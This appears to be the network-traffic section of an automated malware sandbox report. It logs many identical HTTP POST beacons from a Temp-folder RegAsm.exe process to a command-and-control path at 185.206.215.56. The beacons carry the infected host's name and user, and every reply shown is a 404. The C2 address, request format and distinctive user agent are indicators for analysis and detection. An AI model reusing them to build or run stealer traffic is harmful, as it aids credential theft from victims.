                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        118192.168.2.2249285185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:53.527158022 CET1297OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:53.605539083 CET1297OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:53.705441952 CET1298INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:52 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        119192.168.2.2249286185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:53.922498941 CET1298OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:53.996371984 CET1299OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:54.077630997 CET1299INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:53 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        12192.168.2.2249179185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:12.075634003 CET1157OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:12.152301073 CET1158OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:12.243051052 CET1158INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:11 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        120192.168.2.2249287185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:54.285753012 CET1300OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:54.356172085 CET1300OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:54.453917980 CET1300INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:53 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        121192.168.2.2249288185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:54.662266970 CET1301OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:54.745896101 CET1301OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:54.864166021 CET1302INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:53 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        122192.168.2.2249289185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:55.070986032 CET1302OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:55.137275934 CET1303OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:55.223018885 CET1303INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:54 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        123192.168.2.2249290185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:55.427130938 CET1304OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:55.496157885 CET1304OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:55.590567112 CET1304INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:54 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        124192.168.2.2249291185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:55.812036037 CET1305OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:55.886481047 CET1305OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:55.997741938 CET1306INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:55 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        125192.168.2.2249292185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:56.213303089 CET1306OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:56.293616056 CET1307OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:56.397186995 CET1307INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:55 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        126192.168.2.2249293185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:56.594263077 CET1308OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:56.667865992 CET1308OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:56.764003992 CET1308INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:55 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        127192.168.2.2249294185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:56.973337889 CET1309OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:57.042802095 CET1309OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:57.143234015 CET1310INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:56 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        128192.168.2.2249295185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:57.346020937 CET1310OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:57.433732033 CET1311OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:57.532123089 CET1311INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:56 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        129192.168.2.2249296185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:57.742988110 CET1312OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:57.808327913 CET1312OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:57.910446882 CET1312INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:56 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        13192.168.2.2249180185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:12.449877024 CET1159OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:12.527606964 CET1159OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:12.609106064 CET1159INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:11 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        130192.168.2.2249297185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:58.107471943 CET1313OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:58.183504105 CET1313OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:58.291277885 CET1314INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:57 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        131192.168.2.2249298185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:58.499485016 CET1314OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:58.574080944 CET1315OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:58.677454948 CET1315INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:57 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        132192.168.2.2249299185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:58.918368101 CET1316OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:58.996465921 CET1316OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:59.104108095 CET1316INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:58 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
